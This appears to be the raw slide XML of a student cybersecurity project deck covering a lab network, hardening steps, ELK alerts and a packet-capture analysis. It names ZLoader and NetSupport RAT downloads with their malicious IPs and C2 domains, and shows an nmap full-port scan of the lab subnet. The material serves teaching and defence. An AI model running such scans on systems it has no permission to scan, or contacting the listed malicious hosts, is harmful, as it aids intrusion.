              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Maximum of system.process.cpu.total.pct over all documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" u="sng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u="sng" dirty="0"/>
              <a:t>Threshold:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Above 0.5 for the last 1 minute.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5CED2DAB-25D6-E14E-A1BB-3A445C333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t="21475" b="36997"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="804075" y="3429000"/>
            <a:ext cx="1016555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01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Hardening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36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Target 1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Hardening Against Open Ports and Port Scanning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541211" y="2257425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 well configured firewall can be used to alert and prevent information gathering.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Zero trust policies; slowly add trusted networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/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Make sure to have ports closed, not blocked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/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Common tools for securing ports are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>firewalld, ufw, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or any 3rd </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     party firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2857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NIDS and HIDS like Snort can aid in detecting port scans.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4E4355F-35DE-DE40-B843-709F0F68C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3798" y="3688586"/>
            <a:ext cx="3297237" cy="263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14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Target 1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Hardening Against User Enumeration and Simple Passwords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1997839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WordPress User Enumeration</a:t>
            </a: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Disable the WordPress REST API unless required.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Disable the WordPress XML-RPC unless required.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Configure your web server to block requests to /?author=&lt;number&gt;.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Don’t expose /wp-admin and /wp-login.php directly to the public.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Simple Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Require certain password length and complexity for all users.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Consider multi-factor authentication.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Enable continuous password monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>.</a:t>
            </a:r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B2FE76A-32CD-8F48-9121-C026E5211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4739" y="3745393"/>
            <a:ext cx="3139120" cy="31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0" name="Rectangle 199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35" y="2461494"/>
            <a:ext cx="7753235" cy="28511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Network Topology</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:b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0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Target 1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Hardening Against Python Root Vulnerability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2071688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Edit sudo privileges to disable paths to root escalation from local users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr 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F77B98A-5345-FE42-8869-BCCE1703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r="5552"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3429000"/>
            <a:ext cx="7572376" cy="2301421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18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Target 2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Hardening Against Unsecured/Open Ports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2043113"/>
            <a:ext cx="55881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Whitelist known, safe IP’s for SSL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Using firewalld or similar programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        will allow for ease in implementing.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Close port 80 HTTP and open port </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     443 HTTPS for more secure/encrypted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     traffic.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4A4BA1D9-FB06-A24C-B184-B769D91F8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2" b="22985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5991225" y="3429000"/>
            <a:ext cx="4838700" cy="274320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2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Target 2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Hardening Against Directory Listing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498348" y="1543051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Securing the directories prevents unauthorized users from accessing any sensitive information stored here. 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Store the data internally and not directly to the site to avoid easier access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/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Using authentication to access said files.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Change privilege to a Roll-Based privilege system.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00EBD78A-D176-8748-A8F2-899917176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1" b="7727"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="288132" y="4627721"/>
            <a:ext cx="8554116" cy="204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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D600FC-7FE8-BA43-9018-081D27A89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24519" r="56423" b="4791"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7483989" y="2771773"/>
            <a:ext cx="3331650" cy="390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701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743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Target 2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Hardening Against Vulnerable Software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1069848" y="2185988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Updating to a more recent and more stable version of the software.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Newer software updates include known patches for existing vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>syntax: apt-get update &lt;software_name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="ctr" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>apt-get upgrade &lt;software_name&gt;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EDAAE0F-F9D6-7E4E-87FE-BC846A400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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2292753" y="5015806"/>
            <a:ext cx="7188200" cy="5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115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Implementing Patches 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904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Implementing Patches with Ansible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484061" y="1166842"/>
            <a:ext cx="7772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Add Hardening to SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changes permissions for the file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/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SSH Port to Internal Zone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds the ssh port to the internal, trust zone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Add whitelist networks to internal zone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replacing variable with the network needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Adds to internal zone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Disable public ssh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>disables ssh access from outside of internal zone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Account lockout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sets lockout parameters for authentication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Updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>updates to the packages installed on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:endParaRPr lang="en-US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9EA0861B-200B-3C4A-A3A5-B15F2D8A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597" y="1166842"/>
            <a:ext cx="2413302" cy="552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222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Network - Table of Contents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052D3-D2DE-2449-9507-DBC5582F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74520"/>
            <a:ext cx="9634011" cy="4480560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/>
              <a:t>Traffic Profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Normal Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Malicious Activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="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0F1036FA-7FF3-4F4D-BDC6-03DCFD98F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7021" y="4340633"/>
            <a:ext cx="4706838" cy="15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00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Traffic Profile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97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67" y="-120685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Traffic Profile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B21E29-A778-1F4A-A05F-B0E1AFB59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19196"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="242888" y="976595"/>
          <a:ext cx="10460970" cy="55098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426362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4119677314"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3517304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3449212566"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3517304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3486125580"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3892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13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Talkers (IP Addresses)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0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rtl="0"/>
                      <a:endParaRPr lang="en-US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172.16.4.205        49.36%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185.243.115.84    29.16%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10.0.0.201            18.74%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400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Machines that sent the most traffic.</a:t>
                      </a:r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81052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 Common Protocols</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0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TCP     88.5%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UDP    11.2% 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ARP      0.2%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400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Three most common protocols on the network.</a:t>
                      </a:r>
                    </a:p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81738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Unique IP Addresses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IPv4   808</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"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IPv6       2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0"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 of observed IP addresses.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391073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Subnets </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst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172.16.4.0/24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185.243.115.0/24</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr rtl="0"/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10.0.0.0/24</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0"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Observed subnet ranges.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst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89976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Malware Species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malware binaries identified in traffic.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:effectLst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68249962"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36866" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6CF53F-2F06-5E48-83A2-636DC2FE8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94" y="1585354"/>
            <a:ext cx="916787" cy="7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8F9F7F85-D601-DB43-94B2-C1A4A27E8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4" y="2717698"/>
            <a:ext cx="734206" cy="65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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA6FBE4-44A2-7F44-8878-F81AE1F9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594" y="3663315"/>
            <a:ext cx="916787" cy="7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659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Behavioral Analysis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42643-BA51-E140-A029-34C8D013AE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="1323381"/>
            <a:ext cx="4314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Purpose of Traffic on the Network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3B489-B9F8-1048-A935-2B92AEB00792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="1859339"/>
            <a:ext cx="63436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Users were observed engaging in the following kinds of activity.</a:t>
            </a:r>
          </a:p>
          <a:p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Watching YouTube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Browsing medical information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Shopping for toys and records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Suspicious Activity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Creating of server on corporate network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Torrenting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Malware transmission</a:t>
            </a:r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5C852779-EF5D-1046-9EAB-AF4E6DB1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7" y="3814763"/>
            <a:ext cx="3213099" cy="222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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D8B20AF-9868-8F4C-A63B-A679D8E5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619" y="1042987"/>
            <a:ext cx="22331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5" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B4133A-6A2D-4644-8940-6DDA26E9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517" y="3139388"/>
            <a:ext cx="2765146" cy="170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7" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEA328E-94B4-9047-88EA-2E1179BE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075" y="4569157"/>
            <a:ext cx="1924784" cy="13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9" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D2B1A2-39C9-B046-8293-A2728ACB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349" y="1941425"/>
            <a:ext cx="2146754" cy="195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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76DE3E43-2A89-444C-971B-749D12A9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19167">
            <a:off x="8134630" y="3455165"/>
            <a:ext cx="1755775" cy="48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73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999" y="2931736"/>
            <a:ext cx="7651976" cy="3570663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>&amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:b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B4555F-1C50-1049-BA20-441F76961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3" y="1074057"/>
            <a:ext cx="8650153" cy="561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87A0AE-2EF1-EC40-BB2D-371FD8293CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247103" y="355601"/>
            <a:ext cx="6327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Network Topology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0D32B8-9DD4-D94B-A99C-156A620BC60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9283358" y="471714"/>
            <a:ext cx="2824501" cy="7355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Roboto"/>
              </a:rPr>
              <a:t>Network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Address Range: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192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 10.0.0.1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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Machines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IPv4: 192.168.1.100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ELK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 192.168.1.90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Kali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 192.168.1.110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Target 1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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPv4:192.168.1.115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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:effectLst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>Hostname: Target 2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48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Normal Activity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8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Streaming Video Analysis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FAC922-CC22-3E44-BAB5-4C07D0EA8A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488141" y="1323381"/>
            <a:ext cx="5872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Streaming video from Frank-n-Ted.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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UDP port 53</a:t>
            </a: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C2E73D03-302C-454D-95A1-12A930E9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2420661"/>
            <a:ext cx="10277475" cy="387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47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Searching for Record Information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2B068-1F2B-604B-9715-0B1E14513882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="1323381"/>
            <a:ext cx="7243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Browsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.vinylmeplease.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> for record information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HTTP port 80</a:t>
            </a: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27CDE978-B5A0-CE4D-8FE6-0040ED85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47" y="2637435"/>
            <a:ext cx="10234612" cy="35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13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58" y="1992638"/>
            <a:ext cx="7753235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Malicious Activity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1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ZLoader RAT Download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DE11C-12A1-944D-916A-BED77BF03C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500064" y="1404014"/>
            <a:ext cx="62865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frank-n-ted.com (10.6.12.203) downloaded a file malicious file from 205.185.125.104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HTTP GET requests were made for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pQBtWj</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>june11.dll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This is commonly associated with an Excel macro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june11.dll is a RAT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It POSTS to the host snnmnkxdhflwgthqismb.com (5.101.51.151)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snnmnkxdhflwgthqismb.com is a C2 site for the ZLoader RAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945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9484B6-1F60-4940-A8C6-5A6E08CC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811" y="1758121"/>
            <a:ext cx="2939175" cy="31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00082A-936A-4642-93EB-5B025026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6390" y="170846"/>
            <a:ext cx="3952946" cy="246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248CD4-0F54-404B-BE4E-7A982CB4D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7766" y="-2264281"/>
            <a:ext cx="5064350" cy="31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4CA4AADD-EDB8-9B4B-97B2-709529274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4" y="1281277"/>
            <a:ext cx="4720392" cy="31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CE6354-63EA-804D-A554-5E0A0A734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4" y="3670769"/>
            <a:ext cx="2614611" cy="19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2A7D4D-5942-0D4A-92D2-5FB908A7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77" y="3670769"/>
            <a:ext cx="1966079" cy="196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594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6101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NetSupport RAT Download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AE09C3-8190-FE4E-A5C2-1C62D1DC61B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785812" y="1128712"/>
            <a:ext cx="670083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a Remote Access Trojan - NetSupport RAT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Visit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://green.mattingsolutions.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (185.243.115.84)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/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This is a known infected site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Likely a fake web browser update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POST request to 185.243.115.84 included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/>
              <a:t>501 ASCII hexadecimal data files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      empty.gif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/>
              <a:t>2 screen shots of the infected user’s desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>empty.gif?ss&amp;ss1.img and empty.gif?ss&amp;ss2.img</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" fontAlgn="base"/>
            <a:endParaRPr lang="en-US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POST requests to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://31.7.62.214/fakeurl.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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dirty="0"/>
              <a:t>114 application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fakeurl.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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This file name is associated the the NetSupport RAT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0E0C4A14-415C-8749-9B59-B6740390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294" y="4432700"/>
            <a:ext cx="2828608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D3843AE-E184-7C4D-AC48-4895CC72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33" y="1323381"/>
            <a:ext cx="4378722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6E18B1E5-1A1D-BB4F-889C-0801F2B03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008" y="3429000"/>
            <a:ext cx="2252830" cy="291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89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2" y="13404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935" y="2003201"/>
            <a:ext cx="3923330" cy="22567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rgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The End</a:t>
            </a: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39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Scan The Network &amp; Identify IP Addresses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204658-8088-E647-ADA8-5D9D9FD17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5" r="34411" b="7015"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069848" y="1714499"/>
            <a:ext cx="4175944" cy="438626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E50239-BBBE-984F-922B-81359874F399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7121652" y="2770640"/>
            <a:ext cx="465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Nmap  -T4 -v -p- 192.168.1.0/24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CC0F40-8F19-ED42-BD72-3B0FEF364708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886853" y="1923810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radley Hand ITC" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Bradley Hand ITC" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance Stage: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7B9B6-A29B-414A-9C27-5AEBFAE9EA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3718029"/>
            <a:ext cx="4457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Nmap to scan network for open ports and IP addresses. This scan identifies the services below as potential points of entry,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9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65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5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8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9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0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1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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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9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0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2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3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4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5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6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7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8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9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0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1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2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3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4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5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0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1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323" name="Rectangle 322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 on pink">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88564EAC-F472-4D15-80C9-569D9E131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5" name="Rectangle 324">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933BD51B-53C3-4AA2-8BD3-AFDF9E98B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157941" y="-1157556"/>
            <a:ext cx="6858000" cy="9173882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="71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96" y="1371600"/>
            <a:ext cx="7753235" cy="394862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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reconnaissance and Exploitations of Target 1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="5000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr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94FD3EC-1310-4AD0-9781-ECB252862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rgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="328" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672A918A-85C5-4B31-8998-25857DAB5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15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0815E64-1D86-4D7E-8CE3-57F2E67B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18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{497B2EDF-E079-4AC9-8201-79F55E655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22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23833C89-2511-479D-BC7D-43F4661DC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134D3974-8C13-4CDE-B973-7120BB807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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF1FC02-08FF-4338-9BB7-15FA81B92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20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
